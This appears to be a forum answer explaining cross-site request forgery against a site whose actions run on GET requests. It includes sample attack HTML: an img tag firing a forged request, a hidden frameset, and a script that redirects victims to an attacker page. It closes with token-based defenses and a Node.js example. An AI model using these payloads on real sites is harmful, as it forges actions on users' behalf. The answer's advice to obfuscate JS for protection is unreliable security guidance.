Firstly, I can see that this is a CSRF vulnerability. If your website has JS which executes a GET request, then I see the following scenario:
1.-An attacker can see and analyze your JS code and use it for his/her purposes.
2.-The attacker could build a website which includes your JS.
<script src="http://victimdomain/js/myscript.js"></script>
3.-The website contains a tag which executes the JS so the end user will not realize it.
<body onload="sendRequest('Bob');">
4.-A problem could be that if the JS code redirects to another site, the victim would know that something bad has happened. The attacker needs to know how the JS code handles the response and try to modify it to keep the victim on the current website; maybe he/she needs to write a JS function for this purpose.
5.-Finally, the attacker just sends his exploit (malicious website) to the victims and they won't realize what happened.
In this way, a CSRF attack could be easy to exploit. Now, if you didn't have JS code to execute a GET request, the attacker would have more options to exploit; for example, as you said, an attacker could do something like this:
<img src="http://victimdomain/action?param=Bob" />
But, as I mentioned before, the GET request could redirect to another site, so this could be a good solution for an attacker:
1.-Build a website with two iframes, something like this:
<html>
<head>
<title>ejemplo CSRF</title>
</head>
<frameset cols="1%, 99%">
<frame src="exploit.html">
<frame src="empty.html">
</frameset>
</html>
2.-exploit.html will contain the GET request.
<img src="http://victimdomain/action?param=Bob" />
3.-empty.html will contain the following code:
<html>
<head>
<title>ejemplo CSRF</title>
<script>
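// Named redirect() so that it matches the onload handler on <body>.
function redirect() {
  // After one second, if this page is inside a frame, navigate the top-level window.
  setTimeout(function () {
    if (top != self) top.location.href = "http://attackerdomain/falsewebsite";
  }, 1000);
}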
</script>
</head>
<body onload="redirect();">
</body>
</html>
4.-The JS function checks the current window; if the topmost window is different from the current window (in this case empty.html), then it redirects to an attacker's website and finally, the victim will not realize what happened.
So, I think your website could be vulnerable to CSRF and there are ways to exploit it (not only my examples), so you should protect your website. My recommendations are:
- Use an unpredictable token for each request.
- If your JS code contains part of your website's business logic, then you should protect it: apply access control so only authorized users can use that JS code, and obfuscate it.
I hope this information helps you.
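
The "unpredictable token for each request" recommendation, sketched server-side as an added example that is not part of the original answer. It assumes Node.js, an in-memory token store, and a hypothetical already-parsed request object `{ method, sessionId, csrfToken }`; the names `issueToken`, `consumeToken` and `handleAction` are illustrative.

```javascript
// Added example: per-request anti-CSRF tokens for the state-changing /action endpoint.
const { randomBytes, timingSafeEqual } = require("node:crypto");

// sessionId -> Set of tokens issued but not yet used (in-memory; assumption for the demo)
const outstanding = new Map();

// Call when rendering a page or form that is allowed to trigger the action.
function issueToken(sessionId) {
  const token = randomBytes(32).toString("hex"); // 256 bits from the CSPRNG
  if (!outstanding.has(sessionId)) outstanding.set(sessionId, new Set());
  outstanding.get(sessionId).add(token);
  return token;
}

// True only for a token issued to this session and not used before.
function consumeToken(sessionId, presented) {
  const tokens = outstanding.get(sessionId);
  if (!tokens || typeof presented !== "string") return false;
  const given = Buffer.from(presented);
  for (const t of tokens) {
    const want = Buffer.from(t);
    if (want.length === given.length && timingSafeEqual(want, given)) {
      tokens.delete(t); // single use: a replayed request fails
      return true;
    }
  }
  return false;
}

// req is a hypothetical, already-parsed request: { method, sessionId, csrfToken }.
// sessionId comes from the cookie the browser attaches automatically, which is
// why it cannot by itself prove that the user's own page sent the request.
function handleAction(req) {
  if (req.method !== "POST") return 405; // <img>, <frame> and <script> loads are GETs
  if (!consumeToken(req.sessionId, req.csrfToken)) return 403;
  return 200; // safe to perform the state change
}
```

The token has to travel in the request body or a custom header, never in a cookie, because cookies are attached to cross-site requests as well.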